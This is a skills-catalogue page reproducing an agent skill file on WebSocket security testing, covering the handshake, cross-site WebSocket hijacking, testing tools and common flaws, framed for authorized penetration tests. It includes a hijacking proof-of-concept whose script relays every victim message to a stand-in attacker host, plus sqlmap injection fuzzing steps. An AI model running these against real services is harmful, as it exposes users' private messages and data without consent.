Agent skill

Websocket Security

by langbyyi in langbyyi/CyberStrikeAI-SRC

WebSocket handshake, CSWSH, tooling (wsrepl, ws-harness, Burp), and common flaws.

Apache-2.0Auto-check passedBackend & APIs

Install Websocket Security

skills CLI
$ npx skills add langbyyi/CyberStrikeAI-SRC --skill websocket-security -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install langbyyi/CyberStrikeAI-SRC websocket-security --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/langbyyi/CyberStrikeAI-SRC.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/websocket-security .claude/skills/websocket-security && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
websocket-security
GitHub stars
135
Used in
1 other repo
Token cost
~1.8k tokens
SKILL.md length
735 words
Files
1
Skills in repo
13
Repo updated
First seen
Licence
Apache-2.0

At a glance

WebSocket handshake, CSWSH, tooling (wsrepl, ws-harness, Burp), and common flaws.

  • Works in 4 steps: PROTOCOL BASICS → CROSS-SITE WEBSOCKET HIJACKING (CSWSH) → TESTING WITH TOOLS → …
  • Apps use real-time channels
  • SKILL.md covers QUICK START, 1. PROTOCOL BASICS, 2. CROSS-SITE WEBSOCKET… and 3. TESTING WITH TOOLS, plus 5 more sections
  • Calls pip and python

What it does

Websocket Security is an agent skill from langbyyi/CyberStrikeAI-SRC. WebSocket handshake, CSWSH, tooling (wsrepl, ws-harness, Burp), and common flaws. Use when apps use real-time channels, chat, notifications, or WS-backed APIs.

Its SKILL.md is about 1.8k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Backend & APIs, covering Realtime and WebSockets. The licence is Apache-2.0.

When your agent uses it

  • Apps use real-time channels
  • Tasks that involve Realtime and WebSockets

Example prompts

  • “/websocket-security”

Requirements

  • Python 3

Workflow steps

4 steps, taken from the step headings in SKILL.md.

  1. PROTOCOL BASICS
  2. CROSS-SITE WEBSOCKET HIJACKING (CSWSH)
  3. TESTING WITH TOOLS
  4. COMMON VULNERABILITIES

What it can do on your machine

Read from SKILL.md and the folder at commit 166ee1c. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Shell commands in SKILL.md call:

    • pip
    • python

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md. Its commands use pip, which can reach the network depending on how they are called.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Websocket Security loads about 1.8k tokens when it runs. Until then it costs about 45 tokens; SKILL.md has 735 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~45
When it runs · the whole SKILL.md, loaded when a task matches
~1.8k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from langbyyi/CyberStrikeAI-SRC at commit 166ee1c, republished under its Apache-2.0 licence (© langbyyi). 735 words, ~1,825 tokens.

Download SKILL.mdSave it as .claude/skills/websocket-security/SKILL.md (or your agent's skills folder).
name
websocket-security
description
WebSocket handshake, CSWSH, tooling (wsrepl, ws-harness, Burp), and common flaws. Use when apps use real-time channels, chat, notifications, or WS-backed APIs.

SKILL: WebSocket Security

AI LOAD INSTRUCTION: This skill covers WebSocket protocol basics, cross-site WebSocket hijacking (CSWSH), practical tooling bridges, and common vulnerability classes. Apply only in authorized tests; treat tokens and message content as sensitive. For REST/GraphQL companion testing, cross-load api-security when present in the workspace.

QUICK START

First-pass probes
SignalProbeWhy
ws:// or wss:// endpoint foundConnect and send {"action":"ping"}Confirm WebSocket is live and message format
Handshake does not validate OriginOpen WS from evil.com JS PoCCSWSH — hijack victim's channel
Auth checked on handshake?Connect with no cookies / invalid tokenMissing auth = unauthenticated access
Message tamperingModify JSON fields in WS framesServer-side injection (SQLi, command injection)
ws:// in productionFlag cleartext transportMITM risk
bash
# Quick test — connect and probe WebSocket
wscat -c wss://target.example.com/ws

During proxy or raw traffic review, watch for:

http
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Version: 13
Sec-WebSocket-Protocol: optional-subprotocol

Server success response indicators:

http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=

Routing hint: Filter for 101 and Upgrade: websocket in Burp/browser DevTools; for deep API testing, align authentication and authorization models with the api-security skill.


1. PROTOCOL BASICS

Client request (typical)
  • Upgrade: websocket and Connection: Upgrade — required upgrade handshake.
  • Sec-WebSocket-Key — base64 nonce; server hashes with magic GUID and responds with Sec-WebSocket-Accept.
  • Sec-WebSocket-Version: 13 — current standard version for browser interoperability.
Server response
  • HTTP/1.1 101 Switching Protocols — handshake complete; subsequent frames are WebSocket binary/text frames per RFC.

Minimal conceptual flow:

text
Client: HTTP GET + Upgrade headers
Server: 101 + Sec-WebSocket-Accept
Channel: framed messages (text/binary), ping/pong, close

2. CROSS-SITE WEBSOCKET HIJACKING (CSWSH)

Condition
  • The server does not validate Origin (or equivalent binding) on the WebSocket handshake, and
  • The victim has an active session (cookie-based or browser-stored creds) to the target site.

Then a malicious page loaded in the victim’s browser may open a WebSocket as the victim, similar in spirit to CSRF but for a persistent bidirectional channel.

Proof-of-concept pattern (laboratory / authorized target only)
javascript
const ws = new WebSocket('wss://vulnerable.example.com/messages');
ws.onopen = () => { ws.send('HELLO'); };
ws.onmessage = (event) => {
  fetch('https://attacker.example.net/?' + encodeURIComponent(event.data));
};

Testing notes: Confirm whether Origin is checked, whether cookies are sent (SameSite rules), and whether subprotocol or custom headers are required—missing checks increase CSWSH risk.


3. TESTING WITH TOOLS

wsrepl
bash
pip install wsrepl
wsrepl -u wss://target.example.com/ws -P auth_plugin.py

Use a plugin to reproduce browser cookies, headers, or token refresh during the WebSocket lifecycle.

ws-harness (bridge to HTTP for other tools)
bash
python ws-harness.py -u "ws://127.0.0.1:8765/path" -m ./message.txt

Example downstream use with SQL injection tooling over the bridged HTTP surface (adjust URL to local listener):

bash
sqlmap -u "http://127.0.0.1:8000/?fuzz=test" --batch
Burp Suite ecosystem
  • SocketSleuth — inspect and manipulate WebSocket traffic inside Burp.
  • WebSocket Turbo Intruder — high-rate or scripted message fuzzing.

4. COMMON VULNERABILITIES

IssueWhy it matters
Missing Origin validationEnables CSWSH from attacker-controlled pages
Auth token in URL (wss://host/ws?token=...)Logs, proxies, Referer leakage, browser history
No rate limiting on messagesAbuse, brute force, DoS
ws:// instead of wss://Cleartext on the wire (MITM)
Injection in message bodiesSQLi, command injection, or XSS if content is stored/reflected elsewhere

Example sensitive URL anti-pattern:

text
wss://api.example.com/stream?access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

Prefer Sec-WebSocket-Protocol, first-message auth, or cookie + CSRF token patterns aligned with product constraints.


Show full SKILL.md (297 more words)Show less

DECISION TREE

  1. Identify endpoint — From JS bundles, Swagger, or 101 responses; note wss vs ws.
  2. Handshake review — Are Origin, Host, and Cookie policies correct? Any token in query string?
  3. Session binding — Reconnect with another user’s cookie jar in Burp; compare subscription topics and data leakage.
  4. CSWSH — Load a local HTML page that connects to the target with victim session active; verify server rejects wrong Origin or uses non-cookie secret.
  5. Message semantics — Fuzz JSON/text payloads for injection; mirror same logic as HTTP API testing.
  6. Transport — Flag ws:// in production; verify TLS and HSTS alignment.

TESTING CHECKLIST

  • Identify WebSocket endpoints from JS bundles, Swagger, or 101 responses
  • Confirm transport uses wss:// (not ws://) in production
  • Verify Origin header validation on WebSocket handshake
  • Test authentication: check if handshake requires valid session or token
  • Test cross-site WebSocket hijacking (CSWSH) with malicious HTML PoC
  • Verify SameSite cookie policy applies to WebSocket connections
  • Check if auth tokens are passed in URL query strings (log leakage risk)
  • Fuzz message payloads for injection (SQLi, command injection, XSS in stored content)
  • Test message tampering: modify JSON fields, unexpected message types, oversized messages
  • Test rate limiting on incoming messages
  • Reconnect with another user's cookie jar to test session binding and topic isolation
  • Verify subprotocol negotiation and custom header requirements

TARGET TOOL ADAPTATION

Use visible http-framework-test for handshake/header checks and execute-python-script or exec for a scoped WebSocket client when frame-level replay is required. Browser/proxy inspection is optional and only applies when the capability is visible; do not assume a repeater MCP exists.


  • From api-security — authentication, authorization, IDOR, and rate limiting often mirror HTTP APIs behind the same WebSocket routes.

Note: WebSocket often shares session and authorization models with REST; align with api-security for the same backend's authentication and resource boundaries.

© langbyyi, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in skills/websocket-security of langbyyi/CyberStrikeAI-SRC.

Open the folder on GitHubat commit 166ee1c

Used in 1 other repository

We found 1 copy of this SKILL.md (exact, near-identical or edited) in other folders, from 1 other GitHub owner. This page covers the copy in langbyyi/CyberStrikeAI-SRC, which our catalogue first saw on October 7, 2026.

Compare with similar skills

Websocket Security next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Websocket Security compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Websocket Security this skilllangbyyi/CyberStrikeAI-SRC1351 repos~1.8kAutomated safety check: PassApache-2.0
Supabase Development and Debuggingsupabase/agent-skills2.7k3 repos~3.6kAutomated safety check: PassMIT
Use Yaakmountain-loop/yaak19k—~1.9kAutomated safety check: PassMIT
Gemini Live API Devgoogle-gemini/gemini-skills4.3k—~4.6kAutomated safety check: PassApache-2.0
Broker Integrationmarketcalls/openalgo2.8k—~4.7kAutomated safety check: NotesAGPL-3.0
Trigger.dev Realtimepapermark/papermark9.2k—~1.7kAutomated safety check: PassCustom licence

Similar skills

  • Official

    General Supabase skill for database, auth, Edge Functions, Realtime and storage work, plus client libraries, migrations, security audits, debugging and reading logs.

    2.7k GitHub starsUsed in 3 repos~3.6k tokens
    Backend & APIsAuto-check passed
  • Use Yaak

    mountain-loop/yaak

    A skill your agent uses when the user mentions Yaak, a Yaak workspace, or the yaak command, or asks to call, hit, or smoke test HTTP/REST endpoints, save or organize API requests for reuse or manual…

    19k GitHub stars~1.9k tokensUpdated 2 days ago
    Backend & APIsAuto-check passed
  • Gemini Live API Dev

    google-gemini/gemini-skills

    Official

    A skill your agent uses when building real-time, bidirectional streaming applications with the Gemini Live API, or migrating legacy Live models (2.0/2.5/3.1) to Gemini 3.8 Live.

    4.3k GitHub stars~4.6k tokensUpdated 2 days ago
    Backend & APIsAuto-check passed
  • Broker Integration

    marketcalls/openalgo

    Integrate a new Indian broker into OpenAlgo, or modify an existing broker plugin.

    2.8k GitHub stars~4.7k tokensUpdated today
    Backend & APIsAuto-check: notes
  • Trigger.dev Realtime

    papermark/papermark

    Shows how to subscribe to Trigger.dev task runs from the backend and from React for progress indicators, live dashboards, AI response streams and approval waits.

    9.2k GitHub stars~1.7k tokensUpdated 1 mo ago
    Backend & APIsAuto-check passed
  • Spider King

    aoyunyang/spider-king-skill

    Pure-web protocol reverse skill: turn hostile browser clients into browser-free Python collectors.

    509 GitHub stars~7.3k tokensUpdated 1 mo ago
    Backend & APIsAuto-check passed

More from langbyyi/CyberStrikeAI-SRC

All 13 skills in this repo
  • Burp MCP Vuln Check

    langbyyi/CyberStrikeAI-SRC

    Automate low-impact web vulnerability verification through Burp MCP.

    135 GitHub stars~3.1k tokensUpdated 2 days ago
    Auto-check passed
  • Authbypass Authentication Flaws

    langbyyi/CyberStrikeAI-SRC

    Authentication bypass testing playbook. An agent skill from langbyyi/CyberStrikeAI-SRC.

    135 GitHub starsUsed in 1 repo~3.9k tokens
    Auto-check passed
  • HTTP Parameter Pollution

    langbyyi/CyberStrikeAI-SRC

    HTTP Parameter Pollution (HPP): duplicate query/body keys parsed differently by servers, proxies, WAFs, and app frameworks.

    135 GitHub starsUsed in 1 repo~2.2k tokens
    Auto-check passed
  • Insecure Source Code Management

    langbyyi/CyberStrikeAI-SRC

    Source control and artifact exposure (.git, .svn, .hg, backups, .env).

    135 GitHub starsUsed in 1 repo~1.3k tokens
    Auto-check: notes
  • Type Juggling

    langbyyi/CyberStrikeAI-SRC

    PHP type juggling and weak comparison (==) bypass. An agent skill from langbyyi/CyberStrikeAI-SRC.

    135 GitHub starsUsed in 1 repo~2.9k tokens
    Auto-check passed
  • Xslt Injection

    langbyyi/CyberStrikeAI-SRC

    XSLT injection testing: processor fingerprinting, XXE and document() SSRF, EXSLT write primitives, PHP/Java/.NET extension RCE surfaces.

    135 GitHub starsUsed in 1 repo~3k tokens
    Auto-check passed

Categories

Questions about Websocket Security

What does Websocket Security do?

WebSocket handshake, CSWSH, tooling (wsrepl, ws-harness, Burp), and common flaws. Websocket Security is an agent skill from langbyyi/CyberStrikeAI-SRC. WebSocket handshake, CSWSH, tooling (wsrepl, ws-harness, Burp), and common flaws.

When should I use Websocket Security?

Websocket Security fits situations like: apps use real-time channels; tasks that involve Realtime and WebSockets.

How do I install Websocket Security in Claude Code?

Run `npx skills add langbyyi/CyberStrikeAI-SRC --skill websocket-security -a claude-code`. Or copy the skill folder (skills/websocket-security in langbyyi/CyberStrikeAI-SRC) into .claude/skills/websocket-security in your project. Claude Code loads it when a task matches its description.

How do I install Websocket Security in Codex?

Run `npx skills add langbyyi/CyberStrikeAI-SRC --skill websocket-security -a codex`. Or copy the skill folder (skills/websocket-security in langbyyi/CyberStrikeAI-SRC) into .agents/skills/websocket-security in your project. Codex loads it when a task matches its description.

Can I use Websocket Security in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add langbyyi/CyberStrikeAI-SRC --skill websocket-security -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/websocket-security, .gemini/skills/websocket-security, .github/skills/websocket-security and .opencode/skills/websocket-security in your project.

What does Websocket Security need to run?

Going by SKILL.md and its folder, Websocket Security needs the command-line tools its instructions call (pip and python). Our summary lists: Python 3.

Does Websocket Security access the network?

SKILL.md contains no URLs. Its commands use pip, which can reach the network depending on how they are called. This is read from the text; nothing was executed.

Is Websocket Security safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Websocket Security use?

Websocket Security is published under the Apache-2.0 licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Websocket Security use?

About 1.8k tokens (SKILL.md is roughly 7.3k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Websocket Security?

Skills that share tags, products or a category with Websocket Security: Supabase Development and Debugging (supabase/agent-skills, 2.7k stars), Use Yaak (mountain-loop/yaak, 19k stars), Gemini Live API Dev (google-gemini/gemini-skills, 4.3k stars) and Broker Integration (marketcalls/openalgo, 2.8k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Websocket Security?

langbyyi (a GitHub user) maintains it in langbyyi/CyberStrikeAI-SRC, which has 135 GitHub stars. The repository holds 13 skills in this directory. The repository was last updated on October 7, 2026.

Source: langbyyi/CyberStrikeAI-SRC on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.